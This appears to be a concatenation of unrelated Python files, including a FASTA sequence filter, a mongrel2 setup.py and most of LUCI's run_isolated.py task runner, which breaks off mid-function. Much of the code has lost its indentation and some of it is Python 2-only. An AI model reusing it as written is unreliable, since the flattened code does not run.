:param super_funds: The super_funds of this SuperFunds. # noqa: E501
:type: list[SuperFund]
"""
self._super_funds = super_funds
|
from reef import create_app
application = create_app()
|
class American:
@staticmethod
def printNationality():
print('America')
American.printNationality()
American().printNationality()
|
#!/usr/bin/python
import gendsession
class MySubClassExample(gendsession.GEndSessionListenerBase):
def end_session_actions(self):
print "Performing user specified logout actions"
example = MySubClassExample()
example.start()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Cherry pick of fasta sequences satisfying a query string in their header/name
import argparse
from Bio import SeqIO
def Parser():
the_parser = argparse.ArgumentParser(
description='Cherry pick fasta sequences')
the_parser.add_argument('--input', action='store', type=str,
help='input fasta file')
    the_parser.add_argument('--searchfor', action='store', type=str,
                            help="'with' to keep sequences whose header "
                                 "matches the query, 'without' to exclude them")
the_parser.add_argument('--mode', action='store', type=str,
default='includes', help='exact or includes')
the_parser.add_argument('--query-string', dest='query_string',
action='store', type=str,
help='headers containing the string will be \
extracted or excluded as well as the \
corresponding sequence')
the_parser.add_argument('--query-file', dest='query_file',
action='store', type=str,
help='headers containing any of the strings \
provided in the text file (1 string per \
line) will be extracted or excluded as well \
as the corresponding sequence')
the_parser.add_argument('--output', action='store', type=str,
help='output fasta file')
args = the_parser.parse_args()
return args
def parse_fasta_dict(query, fasta_dict, mode):
    if not isinstance(query, list):
        query = [query]
    accumulator = []
    if mode == 'includes':
        for seq_id in fasta_dict:
            for string in query:
                if string in seq_id:
                    accumulator.append(seq_id)
                    break  # one matching query string is enough for this header
    elif mode == 'exact':
        for seq_id in fasta_dict:
            for string in query:
                if string == seq_id:
                    accumulator.append(seq_id)
                    break  # exact match found, no need to test further queries
    res_dict = {k: fasta_dict[k] for k in fasta_dict if k in accumulator}
    return res_dict
def complement_fasta_dict(fasta_dict, subfasta_dict):
fasta_ids = list(fasta_dict.keys())
subfasta_ids = list(subfasta_dict.keys())
complement_ids = list(set(fasta_ids) - set(subfasta_ids))
sub_dict = {k: fasta_dict[k] for k in fasta_dict if k in complement_ids}
return sub_dict
def getquerylist(file):
querylist = []
for line in open(file, 'r'):
querylist.append(line.rstrip())
return querylist
def build_fasta_dict(fasta):
seq_dict = {rec.id: rec.seq for rec in SeqIO.parse(fasta, "fasta")}
return seq_dict
def write_fasta_result(fasta_dict, file):
line_length = 60
with open(file, 'w') as f:
for header in sorted(fasta_dict):
f.write('>%s\n' % header)
if len(fasta_dict[header]) <= line_length:
f.write('%s\n' % fasta_dict[header])
else:
for i in range(line_length, len(fasta_dict[header]),
line_length):
f.write('%s\n' % fasta_dict[header][i-line_length:i])
f.write('%s\n' % fasta_dict[header][i:])
def __main__():
''' main function '''
args = Parser()
    fasta_dict = build_fasta_dict(args.input)
if args.query_string:
query = args.query_string
elif args.query_file:
query = getquerylist(args.query_file)
if args.searchfor == 'with':
fasta_result_dict = parse_fasta_dict(query, fasta_dict, args.mode)
elif args.searchfor == 'without':
fasta_result_dict = complement_fasta_dict(fasta_dict, parse_fasta_dict(
query, fasta_dict,
args.mode))
write_fasta_result(fasta_result_dict, args.output)
if __name__ == '__main__':
__main__()
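# Usage sketch (the script name, file names and query strings below are
# hypothetical):
#
#   python cherry_pick.py --input sequences.fa --searchfor with \
#       --mode includes --query-string mitochondrion --output picked.fa
#
#   python cherry_pick.py --input sequences.fa --searchfor without \
#       --mode exact --query-file headers.txt --output remaining.fa
#
# The second form drops every record whose header exactly matches one of the
# strings listed (one per line) in headers.txt.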
|
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description': 'Python Connector for Mongrel2',
'author': 'Zed A. Shaw',
'url': 'http://pypi.python.org/pypi/mongrel2-python',
'download_url': 'http://pypi.python.org/pypi/mongrel2-python',
'author_email': 'zedshaw@zedshaw.com',
'version': '1.7.5',
'install_requires': ['nose', 'simplejson', 'pyrepl', 'storm'],
'packages': ['mongrel2', 'mongrel2.config'],
'package_data': {'mongrel2': ['sql/config.sql']},
'scripts': ['bin/m2shpy'],
'name': 'm2py'
}
setup(**config)
|
from src.renderers.teams import TeamsRenderer
# have to replace above with the football equivalents
class Scoreboard:
def __init__(self, canvas, data):
self.canvas = canvas
self.data = data
def render(self):
TeamsRenderer(self.canvas, self.data).render()
# NetworkErrorRenderer(self.canvas, self.data).render()
|
#!/usr/bin/env python
# Copyright 2012 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Runs a command with optional isolated input/output.
Despite the name "run_isolated", it can run a generic non-isolated command
specified as args.
If input isolated hash is provided, fetches it, creates a tree of hard links,
appends args to the command in the fetched isolated and runs it.
To improve performance, keeps a local cache.
The local cache can safely be deleted.
Any ${EXECUTABLE_SUFFIX} on the command line will be replaced with ".exe" string
on Windows and "" on other platforms.
Any ${ISOLATED_OUTDIR} on the command line will be replaced by the location of a
temporary directory upon execution of the command specified in the .isolated
file. All content written to this directory will be uploaded upon termination
and the .isolated file describing this directory will be printed to stdout.
Any ${SWARMING_BOT_FILE} on the command line will be replaced by the value of
the --bot-file parameter. This file is used by a swarming bot to communicate
state of the host to tasks. It is written to by the swarming bot's
on_before_task() hook in the swarming server's custom bot_config.py.
"""
__version__ = '0.9.1'
import argparse
import base64
import collections
import contextlib
import json
import logging
import optparse
import os
import sys
import tempfile
import time
from third_party.depot_tools import fix_encoding
from utils import file_path
from utils import fs
from utils import large
from utils import logging_utils
from utils import on_error
from utils import subprocess42
from utils import tools
from utils import zip_package
import auth
import cipd
import isolateserver
import named_cache
# Absolute path to this file (can be None if running from zip on Mac).
THIS_FILE_PATH = os.path.abspath(
__file__.decode(sys.getfilesystemencoding())) if __file__ else None
# Directory that contains this file (might be inside zip package).
BASE_DIR = os.path.dirname(THIS_FILE_PATH) if __file__.decode(
sys.getfilesystemencoding()) else None
# Directory that contains currently running script file.
if zip_package.get_main_script_path():
MAIN_DIR = os.path.dirname(
os.path.abspath(zip_package.get_main_script_path()))
else:
# This happens when 'import run_isolated' is executed at the python
# interactive prompt, in that case __file__ is undefined.
MAIN_DIR = None
# Magic variables that can be found in the isolate task command line.
ISOLATED_OUTDIR_PARAMETER = '${ISOLATED_OUTDIR}'
EXECUTABLE_SUFFIX_PARAMETER = '${EXECUTABLE_SUFFIX}'
SWARMING_BOT_FILE_PARAMETER = '${SWARMING_BOT_FILE}'
# The name of the log file to use.
RUN_ISOLATED_LOG_FILE = 'run_isolated.log'
# The name of the log to use for the run_test_cases.py command
RUN_TEST_CASES_LOG = 'run_test_cases.log'
# Use short names for temporary directories. This is driven by Windows, which
# imposes a relatively short maximum path length of 260 characters, often
# referred to as MAX_PATH. It is relatively easy to create files with longer
# path length. A use case is with recursive dependency trees like npm packages.
#
# It is recommended to start the script with a `root_dir` as short as
# possible.
# - ir stands for isolated_run
# - io stands for isolated_out
# - it stands for isolated_tmp
ISOLATED_RUN_DIR = u'ir'
ISOLATED_OUT_DIR = u'io'
ISOLATED_TMP_DIR = u'it'
OUTLIVING_ZOMBIE_MSG = """\
*** Swarming tried multiple times to delete the %s directory and failed ***
*** Hard failing the task ***
Swarming detected that your testing script ran an executable, which may have
started a child executable, and the main script returned early, leaving the
children executables playing around unguided.
You don't want to leave children processes outliving the task on the Swarming
bot, do you? The Swarming bot doesn't.
How to fix?
- For any process that starts children processes, make sure all children
processes terminated properly before each parent process exits. This is
especially important in very deep process trees.
- This must be done properly both in normal successful task and in case of
task failure. Cleanup is very important.
- The Swarming bot sends a SIGTERM in case of timeout.
- You have %s seconds to comply after the signal was sent to the process
before the process is forcibly killed.
- To achieve not leaking children processes in case of signals on timeout, you
MUST handle signals in each executable / python script and propagate them to
children processes.
- When your test script (python or binary) receives a signal like SIGTERM (or
  CTRL_BREAK_EVENT on Windows), send it to all children processes and wait for
them to terminate before quitting.
See
https://github.com/luci/luci-py/blob/master/appengine/swarming/doc/Bot.md#graceful-termination-aka-the-sigterm-and-sigkill-dance
for more information.
*** May the SIGKILL force be with you ***
"""
def get_as_zip_package(executable=True):
"""Returns ZipPackage with this module and all its dependencies.
  If |executable| is True, stores run_isolated.py as __main__.py so that the
  zip package is directly executable by python.
"""
# Building a zip package when running from another zip package is
# unsupported and probably unneeded.
assert not zip_package.is_zipped_module(sys.modules[__name__])
assert THIS_FILE_PATH
assert BASE_DIR
package = zip_package.ZipPackage(root=BASE_DIR)
package.add_python_file(THIS_FILE_PATH, '__main__.py' if executable else None)
package.add_python_file(os.path.join(BASE_DIR, 'isolate_storage.py'))
package.add_python_file(os.path.join(BASE_DIR, 'isolated_format.py'))
package.add_python_file(os.path.join(BASE_DIR, 'isolateserver.py'))
package.add_python_file(os.path.join(BASE_DIR, 'auth.py'))
package.add_python_file(os.path.join(BASE_DIR, 'cipd.py'))
package.add_python_file(os.path.join(BASE_DIR, 'named_cache.py'))
package.add_directory(os.path.join(BASE_DIR, 'libs'))
package.add_directory(os.path.join(BASE_DIR, 'third_party'))
package.add_directory(os.path.join(BASE_DIR, 'utils'))
return package
def make_temp_dir(prefix, root_dir):
"""Returns a new unique temporary directory."""
return unicode(tempfile.mkdtemp(prefix=prefix, dir=root_dir))
def change_tree_read_only(rootdir, read_only):
"""Changes the tree read-only bits according to the read_only specification.
The flag can be 0, 1 or 2, which will affect the possibility to modify files
and create or delete files.
"""
if read_only == 2:
# Files and directories (except on Windows) are marked read only. This
# inhibits modifying, creating or deleting files in the test directory,
# except on Windows where creating and deleting files is still possible.
file_path.make_tree_read_only(rootdir)
elif read_only == 1:
# Files are marked read only but not the directories. This inhibits
# modifying files but creating or deleting files is still possible.
file_path.make_tree_files_read_only(rootdir)
elif read_only in (0, None):
# Anything can be modified.
# TODO(maruel): This is currently dangerous as long as DiskCache.touch()
# is not yet changed to verify the hash of the content of the files it is
# looking at, so that if a test modifies an input file, the file must be
# deleted.
file_path.make_tree_writeable(rootdir)
else:
raise ValueError(
'change_tree_read_only(%s, %s): Unknown flag %s' %
(rootdir, read_only, read_only))
def process_command(command, out_dir, bot_file):
"""Replaces variables in a command line.
Raises:
ValueError if a parameter is requested in |command| but its value is not
provided.
"""
def fix(arg):
arg = arg.replace(EXECUTABLE_SUFFIX_PARAMETER, cipd.EXECUTABLE_SUFFIX)
replace_slash = False
if ISOLATED_OUTDIR_PARAMETER in arg:
if not out_dir:
raise ValueError(
'output directory is requested in command, but not provided; '
'please specify one')
arg = arg.replace(ISOLATED_OUTDIR_PARAMETER, out_dir)
replace_slash = True
if SWARMING_BOT_FILE_PARAMETER in arg:
if bot_file:
arg = arg.replace(SWARMING_BOT_FILE_PARAMETER, bot_file)
replace_slash = True
else:
logging.warning('SWARMING_BOT_FILE_PARAMETER found in command, but no '
'bot_file specified. Leaving parameter unchanged.')
if replace_slash:
# Replace slashes only if parameters are present
# because of arguments like '${ISOLATED_OUTDIR}/foo/bar'
arg = arg.replace('/', os.sep)
return arg
return [fix(arg) for arg in command]
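# Example of the substitution performed by process_command() above (values are
# illustrative only):
#
#   process_command(
#       ['./tool${EXECUTABLE_SUFFIX}', '--out=${ISOLATED_OUTDIR}/results.json'],
#       out_dir='/tmp/io', bot_file=None)
#   # -> ['./tool', '--out=/tmp/io/results.json'] on POSIX; on Windows the
#   #    suffix becomes '.exe' and '/' is rewritten to '\\' in the replaced arg.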
def get_command_env(tmp_dir, cipd_info):
"""Returns full OS environment to run a command in.
Sets up TEMP, puts directory with cipd binary in front of PATH, and exposes
CIPD_CACHE_DIR env var.
Args:
tmp_dir: temp directory.
    cipd_info: CipdInfo object if the cipd client is used, None if not.
"""
def to_fs_enc(s):
if isinstance(s, str):
return s
return s.encode(sys.getfilesystemencoding())
env = os.environ.copy()
# TMPDIR is specified as the POSIX standard envvar for the temp directory.
# * mktemp on linux respects $TMPDIR, not $TMP
# * mktemp on OS X SOMETIMES respects $TMPDIR
# * chromium's base utils respects $TMPDIR on linux, $TEMP on windows.
# Unfortunately at the time of writing it completely ignores all envvars
# on OS X.
# * python respects TMPDIR, TEMP, and TMP (regardless of platform)
# * golang respects TMPDIR on linux+mac, TEMP on windows.
key = {'win32': 'TEMP'}.get(sys.platform, 'TMPDIR')
env[key] = to_fs_enc(tmp_dir)
if cipd_info:
bin_dir = os.path.dirname(cipd_info.client.binary_path)
env['PATH'] = '%s%s%s' % (to_fs_enc(bin_dir), os.pathsep, env['PATH'])
env['CIPD_CACHE_DIR'] = to_fs_enc(cipd_info.cache_dir)
return env
def run_command(command, cwd, env, hard_timeout, grace_period):
"""Runs the command.
Returns:
tuple(process exit code, bool if had a hard timeout)
"""
logging.info('run_command(%s, %s)' % (command, cwd))
exit_code = None
had_hard_timeout = False
with tools.Profiler('RunTest'):
proc = None
had_signal = []
try:
# TODO(maruel): This code is imperfect. It doesn't handle well signals
      # during the download phase and there are short windows where things can go
# wrong.
def handler(signum, _frame):
if proc and not had_signal:
logging.info('Received signal %d', signum)
had_signal.append(True)
raise subprocess42.TimeoutExpired(command, None)
proc = subprocess42.Popen(command, cwd=cwd, env=env, detached=True)
with subprocess42.set_signal_handler(subprocess42.STOP_SIGNALS, handler):
try:
exit_code = proc.wait(hard_timeout or None)
except subprocess42.TimeoutExpired:
if not had_signal:
logging.warning('Hard timeout')
had_hard_timeout = True
logging.warning('Sending SIGTERM')
proc.terminate()
# Ignore signals in grace period. Forcibly give the grace period to the
# child process.
if exit_code is None:
ignore = lambda *_: None
with subprocess42.set_signal_handler(subprocess42.STOP_SIGNALS, ignore):
try:
exit_code = proc.wait(grace_period or None)
except subprocess42.TimeoutExpired:
# Now kill for real. The user can distinguish between the
# following states:
# - signal but process exited within grace period,
# hard_timed_out will be set but the process exit code will be
# script provided.
            # - process exited late, exit code will be -9 on posix.
logging.warning('Grace exhausted; sending SIGKILL')
proc.kill()
            logging.info('Waiting for process exit')
exit_code = proc.wait()
except OSError:
# This is not considered to be an internal error. The executable simply
      # does not exist.
sys.stderr.write(
'<The executable does not exist or a dependent library is missing>\n'
'<Check for missing .so/.dll in the .isolate or GN file>\n'
'<Command: %s>\n' % command)
if os.environ.get('SWARMING_TASK_ID'):
# Give an additional hint when running as a swarming task.
sys.stderr.write(
'<See the task\'s page for commands to help diagnose this issue '
'by reproducing the task locally>\n')
exit_code = 1
logging.info(
'Command finished with exit code %d (%s)',
exit_code, hex(0xffffffff & exit_code))
return exit_code, had_hard_timeout
def fetch_and_map(isolated_hash, storage, cache, outdir, use_symlinks):
"""Fetches an isolated tree, create the tree and returns (bundle, stats)."""
start = time.time()
bundle = isolateserver.fetch_isolated(
isolated_hash=isolated_hash,
storage=storage,
cache=cache,
outdir=outdir,
use_symlinks=use_symlinks)
return bundle, {
'duration': time.time() - start,
'initial_number_items': cache.initial_number_items,
'initial_size': cache.initial_size,
'items_cold': base64.b64encode(large.pack(sorted(cache.added))),
'items_hot': base64.b64encode(
large.pack(sorted(set(cache.used) - set(cache.added)))),
}
def link_outputs_to_outdir(run_dir, out_dir, outputs):
"""Links any named outputs to out_dir so they can be uploaded.
Raises an error if the file already exists in that directory.
"""
if not outputs:
return
isolateserver.create_directories(out_dir, outputs)
for o in outputs:
try:
infile = os.path.join(run_dir, o)
outfile = os.path.join(out_dir, o)
if fs.islink(infile):
# TODO(aludwin): handle directories
fs.copy2(infile, outfile)
else:
file_path.link_file(outfile, infile, file_path.HARDLINK_WITH_FALLBACK)
except OSError as e:
logging.info("Couldn't collect output file %s: %s", o, e)
def delete_and_upload(storage, out_dir, leak_temp_dir):
"""Deletes the temporary run directory and uploads results back.
Returns:
tuple(outputs_ref, success, stats)
- outputs_ref: a dict referring to the results archived back to the isolated
server, if applicable.
- success: False if something occurred that means that the task must
forcibly be considered a failure, e.g. zombie processes were left
behind.
- stats: uploading stats.
"""
# Upload out_dir and generate a .isolated file out of this directory. It is
# only done if files were written in the directory.
outputs_ref = None
cold = []
hot = []
start = time.time()
if fs.isdir(out_dir) and fs.listdir(out_dir):
with tools.Profiler('ArchiveOutput'):
try:
results, f_cold, f_hot = isolateserver.archive_files_to_storage(
storage, [out_dir], None)
outputs_ref = {
'isolated': results[0][0],
'isolatedserver': storage.location,
'namespace': storage.namespace,
}
cold = sorted(i.size for i in f_cold)
hot = sorted(i.size for i in f_hot)
except isolateserver.Aborted:
# This happens when a signal SIGTERM was received while uploading data.
        # There are two causes:
# - The task was too slow and was about to be killed anyway due to
# exceeding the hard timeout.
# - The amount of data uploaded back is very large and took too much
# time to archive.
sys.stderr.write('Received SIGTERM while uploading')
# Re-raise, so it will be treated as an internal failure.
raise
success = False
try:
if (not leak_temp_dir and fs.isdir(out_dir) and
not file_path.rmtree(out_dir)):
logging.error('Had difficulties removing out_dir %s', out_dir)
else:
success = True
except OSError as e:
# When this happens, it means there's a process error.
logging.exception('Had difficulties removing out_dir %s: %s', out_dir, e)
stats = {
'duration': time.time() - start,
'items_cold': base64.b64encode(large.pack(cold)),
'items_hot': base64.b64encode(large.pack(hot)),
}
return outputs_ref, success, stats
def map_and_run(
command, isolated_hash, storage, isolate_cache, outputs,
install_named_caches, leak_temp_dir, root_dir, hard_timeout, grace_period,
bot_file, install_packages_fn, use_symlinks, constant_run_path):
"""Runs a command with optional isolated input/output.
See run_tha_test for argument documentation.
Returns metadata about the result.
"""
assert isinstance(command, list), command
assert root_dir or root_dir is None
result = {
'duration': None,
'exit_code': None,
'had_hard_timeout': False,
'internal_failure': None,
'stats': {
# 'isolated': {
# 'cipd': {
# 'duration': 0.,
# 'get_client_duration': 0.,
# },
# 'download': {
# 'duration': 0.,
# 'initial_number_items': 0,
# 'initial_size': 0,
# 'items_cold': '<large.pack()>',
# 'items_hot': '<large.pack()>',
# },
# 'upload': {
# 'duration': 0.,
# 'items_cold': '<large.pack()>',
# 'items_hot': '<large.pack()>',
# },
# },
},
# 'cipd_pins': {
# 'packages': [
# {'package_name': ..., 'version': ..., 'path': ...},
# ...
# ],
# 'client_package': {'package_name': ..., 'version': ...},
# },
'outputs_ref': None,
'version': 5,
}
if root_dir:
file_path.ensure_tree(root_dir, 0700)
elif isolate_cache.cache_dir:
root_dir = os.path.dirname(isolate_cache.cache_dir)
# See comment for these constants.
# If root_dir is not specified, it is not constant.
# TODO(maruel): This is not obvious. Change this to become an error once we
# make the constant_run_path an exposed flag.
if constant_run_path and root_dir:
run_dir = os.path.join(root_dir, ISOLATED_RUN_DIR)
if os.path.isdir(run_dir):
file_path.rmtree(run_dir)
os.mkdir(run_dir)
else:
run_dir = make_temp_dir(ISOLATED_RUN_DIR, root_dir)
  # storage should normally be set, but don't crash if it is not. This can
  # happen as a Swarming task can run without an isolate server.
out_dir = make_temp_dir(ISOLATED_OUT_DIR, root_dir) if storage else None
tmp_dir = make_temp_dir(ISOLATED_TMP_DIR, root_dir)
cwd = run_dir
try:
with install_packages_fn(run_dir) as cipd_info:
if cipd_info:
result['stats']['cipd'] = cipd_info.stats
result['cipd_pins'] = cipd_info.pins
if isolated_hash:
isolated_stats = result['stats'].setdefault('isolated', {})
bundle, isolated_stats['download'] = fetch_and_map(
isolated_hash=isolated_hash,
storage=storage,
cache=isolate_cache,
outdir=run_dir,
use_symlinks=use_symlinks)
change_tree_read_only(run_dir, bundle.read_only)
cwd = os.path.normpath(os.path.join(cwd, bundle.relative_cwd))
# Inject the command
if bundle.command:
command = bundle.command + command
if not command:
# Handle this as a task failure, not an internal failure.
sys.stderr.write(
'<No command was specified!>\n'
            '<Please specify a command when triggering your Swarming task>\n')
result['exit_code'] = 1
return result
# If we have an explicit list of files to return, make sure their
# directories exist now.
if storage and outputs:
isolateserver.create_directories(run_dir, outputs)
command = tools.fix_python_path(command)
command = process_command(command, out_dir, bot_file)
file_path.ensure_command_has_abs_path(command, cwd)
with install_named_caches(run_dir):
sys.stdout.flush()
start = time.time()
try:
result['exit_code'], result['had_hard_timeout'] = run_command(
command, cwd, get_command_env(tmp_dir, cipd_info),
hard_timeout, grace_period)
finally:
result['duration'] = max(time.time() - start, 0)
except Exception as e:
# An internal error occurred. Report accordingly so the swarming task will
# be retried automatically.
logging.exception('internal failure: %s', e)
result['internal_failure'] = str(e)
on_error.report(None)
# Clean up
finally:
try:
# Try to link files to the output directory, if specified.
if out_dir:
link_outputs_to_outdir(run_dir, out_dir, outputs)
success = False
if leak_temp_dir:
success = True
logging.warning(
'Deliberately leaking %s for later examination', run_dir)
else:
# On Windows rmtree(run_dir) call above has a synchronization effect: it
# finishes only when all task child processes terminate (since a running
# process locks *.exe file). Examine out_dir only after that call
# completes (since child processes may write to out_dir too and we need
# to wait for them to finish).
if fs.isdir(run_dir):
try:
success = file_path.rmtree(run_dir)
except OSError as e:
logging.error('Failure with %s', e)
success = False
if not success:
sys.stderr.write(OUTLIVING_ZOMBIE_MSG % ('run', grace_period))
if result['exit_code'] == 0:
result['exit_code'] = 1
if fs.isdir(tmp_dir):
try:
success = file_path.rmtree(tmp_dir)
except OSError as e:
logging.error('Failure with %s', e)
success = False
if not success:
sys.stderr.write(OUTLIVING_ZOMBIE_MSG % ('temp', grace_period))
if result['exit_code'] == 0:
result['exit_code'] = 1
# This deletes out_dir if leak_temp_dir is not set.
if out_dir:
isolated_stats = result['stats'].setdefault('isolated', {})
result['outputs_ref'], success, isolated_stats['upload'] = (
delete_and_upload(storage, out_dir, leak_temp_dir))
if not success and result['exit_code'] == 0:
result['exit_code'] = 1
except Exception as e:
# Swallow any exception in the main finally clause.
if out_dir:
logging.exception('Leaking out_dir %s: %s', out_dir, e)
result['internal_failure'] = str(e)
return result
def run_tha_test(
command, isolated_hash, storage, isolate_cache, outputs,
install_named_caches, leak_temp_dir, result_json, root_dir, hard_timeout,
grace_period, bot_file, install_packages_fn, use_symlinks):
"""Runs an executable and records execution metadata.
Either command or isolated_hash must be specified.
If isolated_hash is specified, downloads the dependencies in the cache,
hardlinks them into a temporary directory and runs the command specified in
the .isolated.
A temporary directory is created to hold the output files. The content inside
this directory will be uploaded back to |storage| packaged as a .isolated
file.
Arguments:
command: a list of string; the command to run OR optional arguments to add
to the command stated in the .isolated file if a command was
specified.
isolated_hash: the SHA-1 of the .isolated file that must be retrieved to
recreate the tree of files to run the target executable.
The command specified in the .isolated is executed.
Mutually exclusive with command argument.
storage: an isolateserver.Storage object to retrieve remote objects. This
object has a reference to an isolateserver.StorageApi, which does
the actual I/O.
isolate_cache: an isolateserver.LocalCache to keep from retrieving the
same objects constantly by caching the objects retrieved.
Can be on-disk or in-memory.
install_named_caches: a function (run_dir) => context manager that installs
named caches into |run_dir|.
leak_temp_dir: if true, the temporary directory will be deliberately leaked
for later examination.
result_json: file path to dump result metadata into. If set, the process
exit code is always 0 unless an internal error occurred.
root_dir: path to the directory to use to create the temporary directory. If
not specified, a random temporary directory is created.
hard_timeout: kills the process if it lasts more than this amount of
seconds.
grace_period: number of seconds to wait between SIGTERM and SIGKILL.
install_packages_fn: context manager dir => CipdInfo, see
install_client_and_packages.
use_symlinks: create tree with symlinks instead of hardlinks.
Returns:
Process exit code that should be used.
"""
if result_json:
# Write a json output file right away in case we get killed.
result = {
'exit_code': None,
'had_hard_timeout': False,
'internal_failure': 'Was terminated before completion',
'outputs_ref': None,
'version': 5,
}
tools.write_json(result_json, result, dense=True)
# run_isolated exit code. Depends on if result_json is used or not.
result = map_and_run(
command, isolated_hash, storage, isolate_cache, outputs,
install_named_caches, leak_temp_dir, root_dir, hard_timeout, grace_period,
bot_file, install_packages_fn, use_symlinks, True)
logging.info('Result:\n%s', tools.format_json(result, dense=True))
if result_json:
# We've found tests to delete 'work' when quitting, causing an exception
# here. Try to recreate the directory if necessary.
file_path.ensure_tree(os.path.dirname(result_json))
tools.write_json(result_json, result, dense=True)
# Only return 1 if there was an internal error.
return int(bool(result['internal_failure']))
# Marshall into old-style inline output.
if result['outputs_ref']:
data = {
'hash': result['outputs_ref']['isolated'],
'namespace': result['outputs_ref']['namespace'],
'storage': result['outputs_ref']['isolatedserver'],
}
sys.stdout.flush()
print(
'[run_isolated_out_hack]%s[/run_isolated_out_hack]' %
tools.format_json(data, dense=True))
sys.stdout.flush()
return result['exit_code'] or int(bool(result['internal_failure']))
# Yielded by 'install_client_and_packages'.
CipdInfo = collections.namedtuple('CipdInfo', [
'client', # cipd.CipdClient object
'cache_dir', # absolute path to bot-global cipd tag and instance cache
'stats', # dict with stats to return to the server
'pins', # dict with installed cipd pins to return to the server
])
@contextlib.contextmanager
def noop_install_packages(_run_dir):
"""Placeholder for 'install_client_and_packages' if cipd is disabled."""
yield None
def _install_packages(run_dir, cipd_cache_dir, client, packages, timeout):
"""Calls 'cipd ensure' for packages.
Args:
run_dir (str): root of installation.
cipd_cache_dir (str): the directory to use for the cipd package cache.
client (CipdClient): the cipd client to use
packages: packages to install, list [(path, package_name, version), ...].
timeout: max duration in seconds that this function can take.
Returns: list of pinned packages. Looks like [
{
'path': 'subdirectory',
'package_name': 'resolved/package/name',
'version': 'deadbeef...',
},
...
]
"""
package_pins = [None]*len(packages)
def insert_pin(path, name, version, idx):
package_pins[idx] = {
'package_name': name,
# swarming deals with 'root' as '.'
'path': path or '.',
'version': version,
}
by_path = collections.defaultdict(list)
for i, (path, name, version) in enumerate(packages):
# cipd deals with 'root' as ''
if path == '.':
path = ''
by_path[path].append((name, version, i))
pins = client.ensure(
run_dir,
{
subdir: [(name, vers) for name, vers, _ in pkgs]
for subdir, pkgs in by_path.iteritems()
},
cache_dir=cipd_cache_dir,
timeout=timeout,
)
for subdir, pin_list in sorted(pins.iteritems()):
this_subdir = by_path[subdir]
for i, (name, version) in enumerate(pin_list):
insert_pin(subdir, name, version, this_subdir[i][2])
assert None not in package_pins
return package_pins
@contextlib.contextmanager
def install_client_and_packages(
run_dir, packages, service_url, client_package_name,
client_version, cache_dir, timeout=None):
"""Bootstraps CIPD client and installs CIPD packages.
  Yields CipdClient, stats, client info and pins (as a single CipdInfo object).
Pins and the CIPD client info are in the form of:
[
{
"path": path, "package_name": package_name, "version": version,
},
...
]
(the CIPD client info is a single dictionary instead of a list)
such that they correspond 1:1 to all input package arguments from the command
  line. These dictionaries make their way all the way back to swarming, where they
become the arguments of CipdPackage.
If 'packages' list is empty, will bootstrap CIPD client, but won't install
any packages.
  The bootstrapped client (regardless of whether the 'packages' list is empty)
  will be made available to the task via $PATH.
Args:
run_dir (str): root of installation.
packages: packages to install, list [(path, package_name, version), ...].
service_url (str): CIPD server url, e.g.
"https://chrome-infra-packages.appspot.com."
client_package_name (str): CIPD package name of CIPD client.
client_version (str): Version of CIPD client.
cache_dir (str): where to keep cache of cipd clients, packages and tags.
timeout: max duration in seconds that this function can take.
"""
assert cache_dir
timeoutfn = tools.sliding_timeout(timeout)
start = time.time()
cache_dir = os.path.abspath(cache_dir)
cipd_cache_dir = os.path.join(cache_dir, 'cache') # tag and instance caches
run_dir = os.path.abspath(run_dir)
packages = packages or []
get_client_start = time.time()
client_manager = cipd.get_client(
service_url, client_package_name, client_version, cache_dir,
timeout=timeoutfn())
with client_manager as client:
get_client_duration = time.time() - get_client_start
package_pins = []
if packages:
package_pins = _install_packages(
run_dir, cipd_cache_dir, client, packages, timeoutfn())
file_path.make_tree_files_read_only(run_dir)
total_duration = time.time() - start
logging.info(
'Installing CIPD client and packages took %d seconds', total_duration)
yield CipdInfo(
client=client,
cache_dir=cipd_cache_dir,
stats={
'duration': total_duration,
'get_client_duration': get_client_duration,
},
pins={
'client_package': {
'package_name': client.package_name,
'version': client.instance_id,
},
'packages': package_pins,
})
def clean_caches(options, isolate_cache, named_cache_manager):
"""Trims isolated and named caches.
The goal here is to coherently trim both caches, deleting older items
independent of which container they belong to.
"""
# TODO(maruel): Trim CIPD cache the same way.
total = 0
with named_cache_manager.open():
oldest_isolated = isolate_cache.get_oldest()
oldest_named = named_cache_manager.get_oldest()
trimmers = [
(
isolate_cache.trim,
isolate_cache.get_timestamp(oldest_isolated) if oldest_isolated else 0,
),
(
lambda: named_cache_manager.trim(options.min_free_space),
named_cache_manager.get_timestamp(oldest_named) if oldest_named else 0,
),
]
trimmers.sort(key=lambda (_, ts): ts)
# TODO(maruel): This is incorrect, we want to trim 'items' that are strictly
    # the oldest, independent of which cache they live in. Right now, the
# cache with the oldest item pays the price.
for trim, _ in trimmers:
total += trim()
isolate_cache.cleanup()
return total
def create_option_parser():
parser = logging_utils.OptionParserWithLogging(
usage='%prog <options> [command to run or extra args]',
version=__version__,
log_file=RUN_ISOLATED_LOG_FILE)
parser.add_option(
'--clean', action='store_true',
      help='Cleans the cache, trimming it if necessary and removing corrupted items, '
'and returns without executing anything; use with -v to know what '
'was done')
parser.add_option(
'--no-clean', action='store_true',
help='Do not clean the cache automatically on startup. This is meant for '
'bots where a separate execution with --clean was done earlier so '
'doing it again is redundant')
parser.add_option(
'--use-symlinks', action='store_true',
help='Use symlinks instead of hardlinks')
parser.add_option(
'--json',
help='dump output metadata to json file. When used, run_isolated returns '
'non-zero only on internal failure')
parser.add_option(
'--hard-timeout', type='float', help='Enforce hard timeout in execution')
parser.add_option(
'--grace-period', type='float',
help='Grace period between SIGTERM and SIGKILL')
parser.add_option(
'--bot-file',
help='Path to a file describing the state of the host. The content is '
'defined by on_before_task() in bot_config.')
parser.add_option(
'--output', action='append',
help='Specifies an output to return. If no outputs are specified, all '
'files located in $(ISOLATED_OUTDIR) will be returned; '
'otherwise, outputs in both $(ISOLATED_OUTDIR) and those '
'specified by --output option (there can be multiple) will be '
'returned. Note that if a file in OUT_DIR has the same path '
'as an --output option, the --output version will be returned.')
parser.add_option(
'-a', '--argsfile',
# This is actually handled in parse_args; it's included here purely so it
# can make it into the help text.
help='Specify a file containing a JSON array of arguments to this '
'script. If --argsfile is provided, no other argument may be '
'provided on the command line.')
data_group = optparse.OptionGroup(parser, 'Data source')
data_group.add_option(
'-s', '--isolated',
help='Hash of the .isolated to grab from the isolate server.')
